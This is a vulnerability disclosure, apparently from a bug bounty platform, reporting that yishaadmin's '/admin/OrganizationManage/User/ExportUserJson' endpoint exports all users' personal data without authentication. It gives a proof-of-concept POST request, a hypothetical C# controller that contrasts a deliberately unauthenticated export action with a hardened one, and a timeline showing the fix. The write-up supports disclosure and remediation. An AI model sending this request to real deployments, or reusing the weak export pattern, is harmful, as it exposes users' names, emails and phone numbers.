Improper Authentication in liukuo362573/yishaadmin


Reported on Jan 24th 2022


Hi, I would like to report an improper authentication vulnerability: the endpoint "/admin/OrganizationManage/User/ExportUserJson" does not require any authentication and returns an xls file containing user data such as username, full name, email, and phone.

Proof of Concept

  • Step 1: Using Burp Suite, send this request:
POST /admin/OrganizationManage/User/ExportUserJson HTTP/1.1
Content-Length: 65
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

  • Step 2: Take the Data value from the response and go to "" + Data to download all users' data. Example:


An unauthenticated user can get the data of all users in the application.
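Added example, not the project's own code: a hypothetical ASP.NET Core MVC controller showing the weak shape the report describes (an export action with no authorization attribute that hands back a path to a publicly served file) beside a hardened form that requires an authenticated, authorized caller and streams the file in the same response, so there is no second unauthenticated download URL. The area, controller and action names mirror the reported URL; the IUserExportService, the "UserExport" policy, the "Admin" role and the startup wiring are assumptions.

```csharp
using Microsoft.AspNetCore.Authorization;
using Microsoft.AspNetCore.Mvc;
using Microsoft.Extensions.DependencyInjection;

// Hypothetical export service (assumption, not part of the project).
public interface IUserExportService
{
    // Builds the xls export in memory and returns its bytes.
    byte[] BuildXls();
}

[Area("OrganizationManage")]
public class UserController : Controller
{
    private readonly IUserExportService _export;

    public UserController(IUserExportService export) => _export = export;

    // WEAK: no [Authorize]. Any anonymous POST triggers the export, and the
    // handler returns a path that the caller then fetches without a login.
    // Kept here only to show the reported shape; with the fallback policy in
    // AuthorizationSetup below enabled, this action would also require login.
    [HttpPost]
    public IActionResult ExportUserJsonWeak()
    {
        var bytes = _export.BuildXls();
        var relativePath = "/export/users.xls";             // assumed public path under wwwroot
        System.IO.File.WriteAllBytes("wwwroot" + relativePath, bytes);
        return Json(new { Data = relativePath });           // client opens "" + Data
    }

    // HARDENED: the action requires an authenticated caller who satisfies the
    // "UserExport" policy, and the file is returned directly in this response,
    // so nothing is written to a web-reachable directory.
    [HttpPost]
    [Authorize(Policy = "UserExport")]
    public IActionResult ExportUserJson()
    {
        var bytes = _export.BuildXls();
        return File(bytes, "application/vnd.ms-excel", "users.xls");
    }
}

// Startup wiring (assumed): deny by default so that a forgotten attribute on a
// new action fails closed rather than open. Actions that must stay public opt
// in explicitly with [AllowAnonymous].
public static class AuthorizationSetup
{
    public static void Configure(IServiceCollection services)
    {
        services.AddAuthorization(options =>
        {
            options.FallbackPolicy = new AuthorizationPolicyBuilder()
                .RequireAuthenticatedUser()
                .Build();
            options.AddPolicy("UserExport", p => p.RequireRole("Admin")); // assumed role name
        });
    }
}
```

With the fallback policy in place, the regression check is to repeat the reporter's request with no session cookie and expect a 401 (or a redirect to the login page under a cookie scheme) instead of a JSON body containing a Data path; the same request with an authenticated non-admin session should yield a 403.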

  • We are processing your report and will contact the liukuo362573/yishaadmin team within 24 hours. (a year ago)
  • We have contacted a member of the liukuo362573/yishaadmin team and are waiting to hear back. (a year ago)
  • We have sent a follow up to the liukuo362573/yishaadmin team. We will try again in 7 days. (a year ago)
  • We have sent a second follow up to the liukuo362573/yishaadmin team. We will try again in 10 days. (a year ago)
  • liukuo362573 validated this vulnerability. (a year ago)
  • nhiephon has been awarded the disclosure bounty.
  • The fix bounty is now up for grabs.
  • liukuo362573 marked this as fixed in 3.1 with commit 05f615. (a year ago)
  • The fix bounty has been dropped.
  • This vulnerability will not receive a CVE.